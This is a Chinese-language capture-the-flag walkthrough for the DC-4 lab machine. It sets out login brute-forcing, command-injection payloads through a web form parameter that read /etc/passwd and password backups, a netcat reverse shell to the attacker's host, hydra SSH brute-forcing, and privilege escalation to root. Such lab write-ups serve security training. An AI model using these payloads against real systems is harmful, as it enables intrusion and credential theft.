环境准备
DC-4靶机链接:百度网盘 请输入提取码
提取码:jq25
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息搜集
1.查看存活主机,根据分析得出 192.168.166.133是DC-4靶机IP地址。
arp-scan -l
2.利用nmap扫描开放端口。
nmap -A- -p -T4 192.168.166.133
3.发现22端口和80端口开放。
尝试访问 192.168.166.133 得到一个登录系统。
漏洞利用
尝试爆破登录
爆破得到账号:admin ,密码:happy
登录后得到一个命令执行的界面
方法一:
1.这里抓包尝试一下是否能绕过,产生命令执行。
radio=ls+-l|pwd&submit=Run
2.抓包看到可以利用管道符进行命令拼接。
尝试查看/etc/passwd。
radio=ls+-l|cat+/etc/passwd&submit=Run
3.查看家目录下的用户。
radio=ls -alhR /home&submit=Run
4.可以看到在/home/jim/backups目录下存在文件old-passwords.bak,可能是密码的备份文件。
尝试查看备份文件。
radio=ls -al|cat+/home/jim/backups/old-passwords.bak&submit=Run
方法二:
1.直接执行命令,进行shell反弹
radio=nc+KALIIP+1234+-e+/bin/sh&submit=Run
nc -nlvp 1234 设置监听 反弹shell
查看home目录 发现有三个用户 把目录切换到jim 查看到三个文件 打开backups
发现一个密码文档 打开查看
既然我们获得了旧密码,也获得了账户。
其实都是一种方法只不过换了种形式来获取密码文档
权限提升
hydra爆破
hydra -L user.txt -P password.txt ssh://192.168.166.133 //-L,-P 都是大写
login:jim
password:jibril04
爆破成功
ssh登录
1.拿到用户名和密码直接登录ssh
2.用find查看可以利用的命令
3.把目录切换到mail 发现有一封邮件
4.发现了另外一个账户,并且文中有该账户的密码。
login:charles
password:^xHhA&hvim0y
5.teehee这个root用户不需要密码就能登录,直接拿flag,轻松拿下!!!